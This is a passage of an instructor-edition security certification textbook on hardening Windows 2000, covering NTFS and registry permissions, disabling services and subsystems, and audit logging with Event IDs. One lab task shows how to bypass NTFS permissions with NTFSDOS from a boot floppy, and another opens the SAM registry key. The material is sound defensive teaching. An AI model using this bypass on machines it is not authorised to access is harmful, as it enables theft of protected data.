Just as a newly created partition has default security settings, so does the installedoperating system. In Windows 2000, some additional measures have been addedto prevent users from changing the system files of Windows itself. Those changesare to hide the folders in the \Winnt folder and the \System32 folder by default;however, a quick click the Show Files option and all is revealed to you. There isa built-in mechanism that is working to your advantage to keep system files frombeing modified. It is called the Windows File Protection (WFP) system, and itsjob is to ensure that system files installed during the setup of Windows are notdeleted or overwritten. Only files that have been digitally signed by Microsoftwill be able to make these changes. You’ll notice this when installing, say, aMicrosoft-approved device driver.

File and Folder PermissionsThe process for viewing permissions is the same in Windows 2000 as it was onWindows NT 4.0. To view the permissions for an object, right-click the object,choose Properties, and view the information on the Security tab. More detaileddata is provided on the Advanced tab. File permissions are different in Windows2000 than they were in Windows NT 4.0. Some of the file permissions availableare defined in the following list:

• Traverse Folder/Execute File—The Traverse Folder permission applies onlyto folders and manages a user’s ability to move through a folder to reach

272 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 326: SCNP Hardening

other files and folders, regardless of the permissions on the folder. TheExecute File permission applies only to files and manages a user’s ability torun program files.

• List Folder/Read Data—The List Folder permission applies only to foldersand manages a user’s ability to view filenames and folder names. The ReadData permission applies only to files, and manages a user’s ability to readfiles.

• Create Folders/Append Data—The Create Folders permission applies only tofolders, and manages a user’s ability to create folders within a folder. TheAppend Data permission applies only to files, and manages a user’s abilityto make changes to the end of a file.

• Delete—This permission manages a user’s ability to delete a file or a folder.

• Read Permissions—This permission manages a user’s ability to read the per-missions of a file or a folder.

• Change Permissions—This permission manages a user’s ability to change thepermissions of a file or a folder.

• Take Ownership—This permission manages a user’s ability to take owner-ship of a file or folder.

• Read Attributes—This permission manages a user’s ability to read theattributes of a file or folder.

• Write Attributes—This permission manages a user’s ability to modify theattributes of a file or folder.

These permissions alone are not considered allowing or denying access; theadministrator must define that for each object. In general, it is not necessary tospecify each of these unique permissions when securing resources. You will mostlikely use the defined permissions of: Full Control, Modify, Read And Execute,List Folder Contents, Read, and Write. The specific abilities of each of these per-missions are defined in the chart shown in Figure 4-9.

Figure 4-9: Windows 2000 NTFS folder permissions.

NTFS Folder Permissions

Lesson 4: Hardening Windows Computers 273

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 327: SCNP Hardening

As you can see, when you apply the Read permission, for example, to a folder, itgets List Folder / Read Data, Read Attributes, and Read Extended Attributes asthe permission to the folder. NTFS file permissions are similar, except that thereis no List Folder Contents option, because the permissions are applying to a file.One big difference from Windows NT 4.0 NTFS permissions is the ability toexplicitly deny each of these permissions.

Inheritance and PropagationWhen you create a new file, this new file will inherit the permissions of its parentfolder, or of the parent partition if it is a root-level folder. Therefore, if a parentfolder is set for Everyone Modify, the file you create in that folder will haveEveryone Modify as its permissions.

There is a way that you can alter this behavior so that the permissions do notwork in this manner. You can create a folder and apply the permissions to theThis Folder Only option, which means that new data created in the folder will notinherit the permissions of the folder. Those new objects will inherit the permis-sions that are set one level higher. Say you have a folder D:\Secure\One and thisfolder has had permissions applied to This Folder Only, and you create a fileD:\Secure\One\test.txt. This file will inherit its permissions from the D:\Secureobject.

You can also block the inheritance of permissions by clearing the Allow Inherit-able Permissions From Parent To Propagate To This Object option on the Securitytab of the Properties windows for an object. When you clear this option, you willbe presented with three options:

• To copy the permissions that this object has inherited.

• To remove all permissions except for those that have been specificallyapplied.

• To cancel the operation and keep the permissions as they were.

The process of setting permissions is similar to that of Windows NT 4.0, with theexception that you will specifically allow or deny access. If you want to give auser or a group what was called No Access in Windows NT, you would give thatuser or group Deny to the Full Control permission in Windows 2000.

Setting permissions is a fairly straightforward job, and one that all security pro-fessionals should be comfortable with. There is a way, however, that an attackerwill be able to get around your NTFS security if he or she is able to get physicalaccess to the computer. This is to use an alternative OS—specifically, MS-DOS.

You might be thinking that using DOS will not have an effect on any files thatare on an NTFS partition, and that DOS will not even be able to recognize theNTFS partition. In most situations this is true; however, there are tools and utili-ties on the market that are designed to access NTFS from DOS. The mostcommon of these tools is simply called NTFSDOS and is made by a companycalled Sysinternals. The following task will allow you to access a secured NTFSfile via DOS.

274 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 328: SCNP Hardening

TASK 4D-1Compromising NTFS Security

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account. This task requires the NTFSDOS utility to beon a bootable floppy disk.

1. On your Windows 2000 boot partition, create a folder called Secure.

2. Within this folder, create a new text file called secret.txt, and add the textThis is a secure file. to the document.

3. Set the security on this file so that the Everyone group has Full Control-Deny, and acknowledge the warning message. Now, not even theadministrator should be able to access this file.

4. Test the security by trying to open the Secure.txt file. You should not beable to access the file.

5. Restart the computer, and boot to DOS, using the bootable floppy diskthat holds NTFSDOS.

6. At the DOS prompt, enter ntfsdos to start the utility. The NTFS partitionsare mounted, with drive letters assigned to them.

7. Navigate to the partition where you created the Secure folder, and entercd secure to change directory to this folder.

8. Enter type secret.txt to display the text file to the screen.

9. Observe the contents of the so-called secret.txt file.

10. Remove the bootable floppy disk, and reboot the computer.

The NULL SessionIn order for a system to provide shared resources to the network, it must commu-nicate with the network. This communication is normally done via anonymousconnections from system to system. Internally, this may not present a problem,but if the machine is directly connected to the Internet, this operation can allowan attacker to learn about the inside network without authorization.

When an attacker connects in this manner (with the anonymous logon), this iscalled a NULL session connection. In order to combat this situation, you shoulddisable the NULL session. This can be done via any of the security templates, asfollows:

1. Open any of the security templates in the MMC.

2. Navigate to Local Policies.

3. Navigate to Security Options.

4. Set Additional Restrictions For Anonymous Connections to No Access With-out Explicit Anonymous Permissions.

If you have not createdboot floppies for this task,provide students with blankdisks and have them createtheir own.

Lesson 4: Hardening Windows Computers 275

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 329: SCNP Hardening

Windows 2000 Printer SecurityWhen you are setting up the security options on a printer in Windows 2000, youhave three permissions that you can apply: Print, Manage Printers, and ManageDocuments.

• The default level of security provided to users is Print, meaning that they aregiven the right to print, pause, resume, restart, and cancel documents thatthey have submitted to a printer.

• If you want to provide users with more control over a printer, you can givethem the permission of Manage Documents. This level of permissions meansthat they are given the right to pause, resume, restart, and cancel all docu-ments that have been submitted to this printer.

• If you want to provide users, such as junior administrators or persons whoare responsible for overall printer management, with even more control overa printer, you can give them the permission of Manage Printers. This meansthat they are given the right to share the printer, change printer permissions,change printer properties, and delete printers.

Although setting permissions can provide you with the security you require, youcan get more control still over the printer. In the Advanced settings of a printer,you can define the hours in which the printer is available. If the printer is to beused only during business hours, there is no reason to have the permissions of theprinter set so that it can be used 24x7. This type of control helps to keep thedevice used for business purposes only.

In addition to securing the printer, you must take care to secure the spooler thatholds print jobs waiting to print. If the spooler is left at the default, it is in the%systemroot%, which allows Everyone Full Control. This location should bemoved to a secure NTFS location, where it can be managed individually.

Windows 2000 Registry SecurityThe Registry stores the configuration data for the computer and, as such, is obvi-ously a critical item to secure properly. Thankfully, users will not have the samelevel of interaction with the Registry as they will with network resources.

The Windows 2000 Registry can be directly manipulated with the same tools asthe Windows NT 4.0 Registry—Regedit.exe and Regedt32.exe. As mentioned ear-lier, it is recommended that Regedt32.exe be used, because permissions can beapplied to individual keys as you see fit. When setting the primary permissions inthe Registry, however, you have only Read and Full Control to choose from.

Securing Printers inWindows 2000

Securing the Registry inWindows 2000

276 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 330: SCNP Hardening

The permissions that are available for the Registry are different than the permis-sions used for securing files. The following list contains the permissions thataffect the Registry:

• Query Value—Ask for and receive the value of a Registry key.

• Set Value—Change a key value.

• Create Subkey—Create a subkey.

• Enumerate Subkeys—List the subkeys.

• Notify—Set auditing.

• Create Link—Link this key to some other key.

• Write DAC—Change permissions.

• Read Control—Find the owner of a key.

• Write Owner—Change ownership of a key.

• Delete—Delete the key.

Of the two permissions that can be applied, Full Control is the equivalent of allthe permissions listed. The Read permission is the equivalent of the Query Value,Notify, Read Control, and Enumerate Subkeys permissions. The listing or theRead permission can be a bit misleading at times.

There is no Special Access Permission listing on the primary Permissions page,but there is an Advanced button. If a user has the Read box checked, you shouldreview the Special Access Permissions to be sure of the exact permissions givento that user. On the same page as the special permissions is the settings for wherethis set of permissions is to be applied. You have the ability to apply permissionsto This Key Only, This Key and Subkeys, or to Subkeys Only.

Default Registry ConfigurationsEarlier, we discussed the processes put in place by Windows to help protect sys-tem files. There are also systems in place to protect the Registry by default.Administrators and the SYSTEM account should have Full Control to all areas ofthe Registry.

Power Users are given permission to create subkeys in the HKEY_LOCAL_MACHINE\SOFTWARE\ key, which has the result of allowing them to installnew software packages. Power Users then have Full Control over the subkeysthey create, as does the CREATOR OWNER Account. The extent of control forPower Users does not expand into all areas of the Registry. For example, in theHardware hive of the Registry, Power Users are not on the list to set permissions,by default.

When changing areas of the Registry, be sure that you have planned out thechanges very carefully, as unintended consequences can happen very easily andquickly. In the following task, you will configure permissions on an area of theRegistry.

audit:The independent examinationof records and activities toensure compliance withestablished controls, policy,and operational procedures,and to recommend anyindicated changes incontrols, policy, orprocedures.

Lesson 4: Hardening Windows Computers 277

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 331: SCNP Hardening

TASK 4D-2Setting Registry Permissions

1. Log on to Windows 2000 as the renamed Administrator account.

2. Open Regedt32 to prepare for setting permissions for the Registry.

3. Select the HKEY_LOCAL_MACHINE window.

4. Expand the SAM and observe that the subkey is grayed out.

5. Select the grayed-out SAM, and choose Security→Permissions.

6. In the Permission list, give the Administrators group Full Control. ClickOK.

7. Expand the SAM to verify that usernames and account information isnow visible to you.

Registry BackupIn order to cover the security of the Registry, you must have a backup strategyfor the organization. There are several ways in which to back up the Registry:

• The first is in the Registry itself—you can save subkeys. If you are going touse this built-in option, be sure that you secure the saved files very well.

• If you do not want to use the save option available in the Registry Editor,you can use the Microsoft Backup program. This utility can create a fullbackup of the System State, which includes the Registry configurationinformation. Just as with the saved subkeys and keys, your storage optionsfor backups is critical. A compromised System State backup can be almostas devastating as a compromise of the server itself.

The final location to secure in regards to Registry backup is in the OS files.Stored in the %systemroot%\repair folder are settings that must be secured. Thisfolder holds the Registry configuration information that is used in the event thesystem needs to be repaired.

TASK 4D-3Saving Registry Information

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Regedt32 is running.

1. Select the Software subkey for HKEY_LOCAL_MACHINE.

2. Choose Registry→Save Key.

3. Create a folder named Reg_Keys on the Windows 2000 partition.

4. For the file name, enter Soft_One as and click Save.

278 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 332: SCNP Hardening

5. Close the Registry Editor.

6. Open My Computer, and navigate to the Reg_Keys folder that youcreated.

7. Right-click and choose Properties. Select the Security tab.

8. Set the security so that only your user account has Full Control, andremove any access to any other user account or group.

9. Close all open windows.

Blocking Access to the RegistryYou might want to implement normal controls on programs such as Regedit.exeand Regedt32.exe to prevent unauthorized users from executing theseapplications. If you are even more paranoid, however, you can completely removethe applications from the hard drive and perform remote Registry management ofthe machine. In the event that deleting the executable files is still not goodenough for your tastes, you can go into the Registry and disable access to theRegistry. Obviously, this can be a dangerous option, as you are literally disablingRegistry editing tools on the local machine. You will have no choice other thanremote management at this stage, so make sure that you can perform remotemanagement prior to taking this action.

TASK 4D-4Blocking Registry Access

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account. For this task, you should again work in pairs,with one partner observing as the other completes the task,and then reversing the roles.

1. Open Regedit, and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies.

2. Right-click Policies, and add a new key called System.

3. In the right pane, right-click and add a new DWORD value namedDisableRegistryTools.

4. Provide a REG_DWORD value of 1. A value of 0 would allow RegistryEditing Tools.

5. Close the Registry Editor.

6. Attempt to access the Registry with either Regedit or Regedt32. Youshould not be able to open the Registry Editor. To recover this ability, youwill need to access the Registry remotely from another computer.

If students are unable tore-enable local Registryaccess, their ability tocomplete future tasks willbe severely affected. Youmight want to have themback up the entire Registryto a safe place prior toperforming this task, or youcan skip the task altogether.

To ensure that you will beable to troubleshoot thistask, make sure that at leastone machine in theclassroom setup always hasthe Registry tools enabled.

Lesson 4: Hardening Windows Computers 279

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 333: SCNP Hardening

7. Create a share of your \WINNT\System32 folder. Allow your remoteadministration (scnpxxxb) account Full Control, and remove all otherpermission for all other users and groups.

8. Switch computers with your neighbor, and access the Registry on yourcomputer. Choose Registry→Connect Network Registry, enter your IPaddress, and click OK.

9. Expand HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.

10. Set DisableRegistryTools to 0 so that you will again be able to edit theRegistry from the local machine.

11. Return to your own computer, and verify that you can open the Registrytools. Notify your instructor if you have trouble completing this step.

12. Close all open windows.

System HardeningNow that you have seen how to secure resources, including access to the Regis-try, it is time to secure the base operating system itself. This includes removal ofunneeded services, setting security permissions on common executables, disablingunused subsystems, and keeping updated on Service Packs and Hotfixes.

Disabling ServicesOn the vast majority of Windows installations, the services that are loaded andrunning by default are not needed, nor will they be used in secure environments.Many of the services are installed with the OS, and others will be added as appli-cations are added to the system.

Figure 4-10: Services that can be managed on a Windows 2000 computer.

Be prepared totroubleshoot. All students

must be able to accessRegistry tools before

proceeding to the nextactivity.

System Hardening

280 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 334: SCNP Hardening

Services can be one of three Startup types: Manual, Automatic, and Disabled.

• Manual Startup implies that you will configure the service upon need, but itwill not start when the system is initialized.

• The Automatic setting will execute the startup configuration when the systemstarts.

• Disabled means that the service will not execute until you manuallyreconfigure it to be an active service.

A nice feature in Windows 2000 is the ability to find out what other services arerequired for a given service to run. These are known as dependencies. Forexample, in order for the Messenger service to run properly, both the RemoteProcedure Call (RPC) and the Workstation service must be running.

Figure 4-11: Example of service dependencies in Windows 2000.

Securing Common ExecutablesIn hardening the OS, an often-overlooked option is to harden the actual programsthat are often used in exploits. You can increase the security of the system byplacing permissions on these applications.

Lesson 4: Hardening Windows Computers 281

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 335: SCNP Hardening

For the applications listed here, you might want to create a new group for indi-viduals who require access, not including the Administrators group or the System(sometimes called LocalSystem on a standalone server) account. Then, providethe desired level of permissions on the executables. Be aware that altering thepermissions on these can affect applications, so you can adjust as needed if thesituation arises. Add to or remove from this list for your unique configuration:

• arp.exe

• at.exe

• attrib.exe

• cacls.exe

• cmd.exe

• command.com

• debug.exe

• dialer.exe

• edit.com

• finger.exe

• ftp.exe

• ipconfig.exe

• nbtstat.exe

• net.exe

• netstat.exe

• nslookup.exe

• ping.exe

• rcp.exe

• rdisk.exe

• regedit.exe

• regedt32.exe

• rexec.exe

• route.exe

• rsh.exe

• runonce.exe

• sysedit.exe

• telnet.exe

• tftp.exe

• tracert.exe

• xcopy.exe

282 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 336: SCNP Hardening

Disabling SubsystemsIn Windows 2000, there are several subsystems that are loaded with the installa-tion of the operating system. These subsystems can provide the environmentsneeded for running software. For example, there is a subsystem for OS/2applications. You might want to remove the subsystems that you will not beusing. To do this requires two steps:

1. Edit the Registry to remove references to the subsystems that you want todisable.

2. Remove the actual files required for the subsystem.

TASK 4D-5Removing Unneeded Subsystems

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and local Registry editing has been re-enabled.

1. Navigate to \WINNT\System32 and delete the files posix.exe, psxss.exe,os2.exe, os2srv.exe, and os2ss.exe.

2. Open the Registry Editor.

3. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems.

4. In this subkey, delete the entries for Posix and Os2.

5. Close the Registry Editor.

Topic 4EWindows 2000 Auditing and LoggingIn Windows 2000, logging can be very complete, enough so that the averageadministrator can easily become frustrated sorting the volumes of information thathave been recorded. The volumes of information that are collected are viewed inthe Event Viewer tool. The Event Viewer offers three primary logs: the Applica-tion Log, Security Log, and the System Log. In this topic, you will be focused onthe Security Log.

Although Windows 2000 automatically tracks and records events in the Applica-tion and System Logs, Security Logging must be turned on in order to view anySecurity Log events. To turn on Security Logging, you must create an AuditPolicy.

Auditing and Logging

Lesson 4: Hardening Windows Computers 283

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 337: SCNP Hardening

Configuring the Audit Policy will allow you to have more granular control overthe specific events that are recorded into the logs. For example, you might wantto log just attempts at logging on and off the system, or only changes to policyoptions. The following list identifies each policy option and provides a shortdescription of the settings:

• Audit Account Logon Events—This setting will log user account logonevents. This can include events like Kerberos ticket information andaccounts used for logon.

• Audit Account Management—This setting logs changes to, creation of, anddeletion of a user account or group. This setting can additionally log renam-ing, disabling, enabling, and password changes for a user account.

• Audit Directory Service Access—This setting logs access to an Active Direc-tory object by a user. In order for this log to function, the object needs to beconfigured for auditing.

• Audit Logon Events—This setting logs users logging on and off, and logsnetwork connection terminations.

• Audit Object Access—This setting logs access to a file, folder, or printer. Inorder for this log to function, the object needs to be configured for auditing.

• Audit Policy Change—This setting will log any changes to the audit poli-cies, user rights, or user security settings.

• Audit Privilege Use—This setting will log use of a privilege by a useraccount.

• Audit Process Tracking—This setting will log applications executing pro-cesses in the system.

• Audit System Events—This setting will log system events, such as the shut-down or restart of the computer.

284 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 338: SCNP Hardening

Figure 4-12: Audit Policy settings of the Local Computer policy.

Object AuditingTo audit access to specific objects such as files, folders, and printers, you willneed to perform configuration on the object itself, in addition to the creation ofthe Audit Policy. The auditing section of the object is located on the Security tabof the Properties for the object. Click the Advanced button, and select the Audit-ing tab.

An example of security-related auditing, other than a normal file-access log, is totrack access to the System32 folder of the OS. As a critical folder, it can providerelevant security information to see which users are accessing the contents of thisfolder, and when they are accessing it.

Active Directory AuditingJust as you can log access to an object like a file or a folder, you can log accessto an Active Directory object. The first thing you need to do is to enable theauditing of Active Directory objects in your Audit Policy. Then, select the specificobjects that you want to audit.

The object you want to auditmust be on an NTFSpartition.

Lesson 4: Hardening Windows Computers 285

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 339: SCNP Hardening

In order for the policy to take effect, you have several options.

• One is to wait until the policy propagates at the regular interval, which canbe configured by the administrator.

• Another option is to run the command secedit /refreshpolicymachine_policy at the command prompt.

TASK 4E-1Enabling Auditing

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. From Administrative Tools, open the Local Security Policy.

2. Expand Local Policies, and select Audit Policy.

3. Double-click Audit Account Logon Events.

4. Check both Success and Failure, and click OK.

5. Double-click Audit Logon Events.

6. Check both Success and Failure, and click OK.

7. Close the Local Security Policy.

8. Open a command prompt, and enter secedit /refreshpolicy machine_policy to force the policy to refresh now.

9. Open the Local Security Policy, and verify that the new settings havetaken effect.

10. Close the Local Security Policy.

Registry AuditingAuditing the Registry can provide critical information in securing the network,and can also provide important data in troubleshooting an event. This is similar tothe process required for auditing other events, in that you choose the object, andthen configure the auditing on the object.

Remember that in order to configure auditing of the Registry, you will need touse Regedt32, not Regedit. When you do configure audits by using Regedt32, beaware that the objects you audit will be tracked even if an access is made usingRegedit.

286 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 340: SCNP Hardening

The options available in auditing the Registry are a bit different than in auditing afile or folder. There are permissions such as Query Value or Set Value. The list ofaccesses that can be audited are shown in Figure 4-13. Some of the auditingoptions are detailed as follows:

• Query Value—Audit the user or group reading the object.

• Set Value—Audit the user or group writing to the object.

• Create Subkey—Audit the user or group creating a key.

• Enumerate Subkeys—Audit the user or group enumerating a list of keys inthe object.

Figure 4-13: Options for auditing the SAM in the Registry.

These options can be configured for either success or failure. So, if you want toknow who has failed in their attempt to read the SAM, you would select thegroup and audit Query Value Failures.

TASK 4E-2Logging SAM Registry Access

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Create a regular user account called Ordinary, and assign Ord1n8ry? asthe password. Remember to uncheck User Must Change Password OnLogon before clicking Create.

2. Allow the Ordinary user account the right to Log On Locally.

Lesson 4: Hardening Windows Computers 287

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 341: SCNP Hardening

3. Open Regedt32.

4. Navigate to HKEY_LOCAL_MACHINE\SAM.

5. Choose Security→Permissions.

6. Click the Advanced button.

7. Select the Auditing tab.

8. Add the user account Ordinary.

9. For Query Value, check both Successful and Failed, and click OK.

10. Click OK to close the SAM Access Control Settings.

11. Click OK to close the SAM Permissions, and close Regedt32.

12. Log off as the renamed Administrator account, and log on as Ordinary.If you are prompted to save the changes to the console, click No.

13. Open a Registry Editor, and attempt to open the SAM subkey. Youshould receive an error message. Click OK to clear the message.

14. Close the Registry Editor, and log off.

15. Log back on as the renamed Administrator account. You will examinethe Event Viewer logs shortly.

Managing the Event ViewerIn the Event Viewer, you will perform your primary functions in reading andmanaging the logs of the system. You can also use software to manage the logsand to send the logs to a database for viewing, but at this point, you will workdirectly in the Event Viewer.

The Event Viewer provides the three logs: Application, System, and Security. Inthe Event Viewer logs, there are five types of events that can be reported. Theyare Error, Warning, Information, Success Audit, and Failure Audit. You can addcomponents to Event Viewer, based on the applications installed, such as DNS, asshown in Figure 4-14.

The logs are listed in the Viewer with the most current event being the highest onthe list. You might need to go up and down the list to follow a sequence ofevents. You can also sort the columns by clicking any column name.

288 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 342: SCNP Hardening

Figure 4-14: An example of the Event Viewer with a Failure Audit.

The objects that you choose to log will provide three primary sources of informa-tion to you:

• The action that was performed.

• The user account that performed the action.

• The success or failure of the event.

You will also be able to learn information, such as the time of the event, namesof computers involved, IP addresses of computers involved, and more. In Figure4-15, you can see an event with the following information:

• The date and time of the event.

• The user account that triggered the event.

• That the event was a failure.

• The name of the computer where the event happened.

• The name of the object that was audited.

From this single detailed log, you are able to say that user account Ordinary, oncomputer named INS-W2K-01, at 19:32, on 11/21/2002, tried and failed to accessthe SAM subkey of the Registry.

Lesson 4: Hardening Windows Computers 289

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 343: SCNP Hardening

Figure 4-15: A failed attempt at accessing a Registry key, logged in Event Viewer.

TASK 4E-3Viewing the Registry Audit

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open the Event Viewer.

2. Open the Security Log.

3. Locate the Failure Event for your attempted Registry access. If for somereason your Failure Event does not display, review the preceding Conceptssection to view an example of one.

4. Compare what you can identify from your log to the previous example.You should be able to identify:

a. User Account

b. Date

c. Time

d. Success or Failure

e. Computer Name

f. Object Accessed

5. Once you have identified these items, close the Event Viewer.

290 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 344: SCNP Hardening

Event IDsAlthough at this stage mentioning that you have a series of 529 events, all oneminute apart may not mean anything, you should be comfortable with the primaryEvent IDs, so that you can quickly be aware of what is happening on the system.

The following table lists common security-related Event IDs. You should becomecomfortable with these IDs, as you will see them often in your work as a securityprofessional.

Event ID Description512 Successful starting of the operating system.513 Successful shutting down of the operating system.517 Successful clearing of the Audit Log.528 Successful logon.529 Failure of a logon due to unknown username or bad password.530 Failure of a logon due to account logon-time restrictions.531 Failure of a logon due to the account being disabled.540 Successful network logon.624 Successful creation of a new user account.626 Successful enabling of a user account.628 Successful change of a user account’s password.629 Successful disabling of a user account.644 Successful locking out of a user account.645 Successful creation of a new computer account.

You can find complete descriptions of Event IDs online in many locations, andfrom Microsoft at http://support.microsoft.com.

Authentication LoggingIn order to bring the overall options in logging down to a smaller subject, youwill focus here just on the Authentication process. Windows 2000 can provideextensive logs on all successes and failures of the logon process. This will assistyou greatly when investigating security issues and troubleshooting account access.

The following table lists Event IDs that are all directly related to the Authentica-tion process in Windows 2000, and are enabled by choosing Success and Failureof Logon Events in the Audit Policy.

Event ID Description528 A successful logon.529 A failed logon due to unknown user name or bad password.530 A failed logon due to account logon-time restrictions.531 A failed logon due to the account being currently disabled.532 A failed logon due to the account being expired.533 A failed logon due to the account not allowed to logon at the computer.534 A failed logon due to the account not being granted the logon type requested

at the computer, such as interactive or network.535 A failed logon due to the account’s password being expired.

Lesson 4: Hardening Windows Computers 291

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 345: SCNP Hardening

Event ID Description536 A failed logon due to NetLogon not being active.537 A failed logon due to an unexpected error during the logon attempt.538 A successful logoff of an account.539 A failed logon due to the account being locked out.540 A successful network logon.

When you go to examine the details of the Authentication Log, you will find thatLogon Type is an entry in the log. There are six different Logon Types:

• Logon Type 2: Interactive

• Logon Type 3: Network

• Logon Type 4: Batch

• Logon Type 5: Service

• Logon Type 6: Proxy

• Logon Type 7: Unlock the Workstation

In addition to the Logon Type that you will find in the log, you will find an entrycalled the Logon Process. There are seven different Logon Processes, and theyare more technical in their description than the previous fields. The Logon Pro-cesses are as follows:

• NtLmSsp or MICROSOFT_AUTHENTICATION_PACKAGE_V1_0: msv1_0.dll, the default authentication package

• KSecDD—ksecdd.sys, the security device driver

• User32 or WinLogon\MSGina—winlogon.exe and msgina.dll, the authentica-tion user interface

• SCMgr—The Service Control Manager

• LAN Manager Workstation Service

• advapi—API call to LogonUser

• MS.RADIU—The RADIUS authentication package; a part of the MicrosoftInternet Authentication Services (IAS)

Frequently, administrators will use only the Logon Events as describedpreviously. You can add Account Logon Events to your Audit Policy. If you doadd this option for Success and Failure, you will see the Event IDs reported, asshown in the following table.

Event ID Description672 Successful authentication ticket granted.673 Successful service ticket granted.674 Successful ticket granted renewed.675 Failure of Pre-Authentication.676 Failure of the authentication ticket request.677 Failure of the service ticket request.678 Successful account mapped for logon.679 Failure of the account being mapped for logon.680 Successful account used for logon.

Numbers 0 and 1 are notvalid Logon Types.

proxy:A firewall mechanism that

replaces the IP address of ahost on the internal

(protected) network with itsown IP address for all traffic

passing through it. Asoftware agent that acts on

behalf of a user; typicalproxies accept a connection

from a user, make a decisionas to whether or not the user

or client IP address ispermitted to use the proxy,

perhaps does additionalauthentication, and then

completes a connection onbehalf of the user to a

remote destination.

292 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 346: SCNP Hardening

Event ID Description681 The logon to account <CLIENT NAME> by <SOURCE> from workstation

computername failed. The Error Code was ErrorCode.682 Successful session reconnected to Winstation.683 Successful session disconnection from Winstation.

Note that for Event ID 681, there is a field called ErrorCode. The error codesprovide an even higher level of detail on the specifics of an event. The followingtable defines the Error Code and provides a description in the reason for thelogon failure.

Error Code Description3221225572 The username provided does not exist.3221225578 The username provided is correct, but the password is incorrect.3221226036 The user account is locked out.3221225586 The user account is disabled.3221225583 The user account attempted to logon outside the user account allowed

logon hours.3221225584 The user account attempted to logon from a workstation the account

did not have the right to logon from.3221225875 The user account has expired.3221225585 The user account attempted to logon using an expired password.3221226020 The user attempted to logon with a user account where the

Administrator has defined User Must Change Password At NextLogon option.

TASK 4E-4Creating Events

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open the Event Viewer.

2. Right-click the Security Log and choose Clear All Events.

3. When you are prompted to save the log, click No.

4. Close the Event Viewer.

5. Create a user account using your first name, and f1R5+n@m3 as thepassword.

6. Grant the new user account the right to log on locally.

Lesson 4: Hardening Windows Computers 293

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 347: SCNP Hardening

7. Lock the computer, while logged on as the renamed Administratoraccount.

8. Unlock the computer, using the renamed Administrator credentials.

9. Log off the renamed Administrator account.

10. Log on as your newest user account (the one with your first name),using the wrong password. This should fail.

11. Log on as your newest user account, using the correct password. Thisshould be successful.

12. Attempt to connect to another computer in the network. This should fail,as user accounts for other students were not created on your computer, andvice versa.

13. Attempt to connect to another computer in the network as a remoteAdministrator account with the correct password. This should besuccessful.

14. Close the network connection, and log off your user account.

15. Log back on as your renamed Administrator account.

Viewing Event LogsNow that you have created a group of events to analyze, you will run throughthis process. Try to follow the sequence of events as you triggered them. Watchfor the local and network differences in the logs and identify the Event IDs forquick analysis.

TASK 4E-5Viewing Event Logs

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open the Event Viewer.

2. Open the Security Log and examine the log. You should be able to iden-tify at least one of each of the following:

a. A successful local logon.

b. A successful unlocking of the computer.

c. A successful network logon.

d. A failed local logon attempt.

e. A failed network logon attempt.

To lock the computer, pressCtrl+Alt+Delete, and then

click Lock Computer.

294 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 348: SCNP Hardening

3. Identify the Event IDs, Logon Types, and the Error Codes where theyapply.

4. Close the Event Viewer.

Managing Log FilesOnce you become more comfortable with Event IDs, you will be aware that aseries of 529 events can be an indication of a possible attack. However, with allof the events that can happen and all of the data that can be collected, the processof simply viewing and managing the log files can become tedious, and evenoverwhelming.

There are features built in to the Event Viewer that are designed to help youwork with the volumes of data that are collected. In addition to the features ofEvent Viewer, there are third-party applications that are designed to manage thelogs. These applications filter specific events, group them for simplicity, and cannotify you in case a defined sequence of events happens.

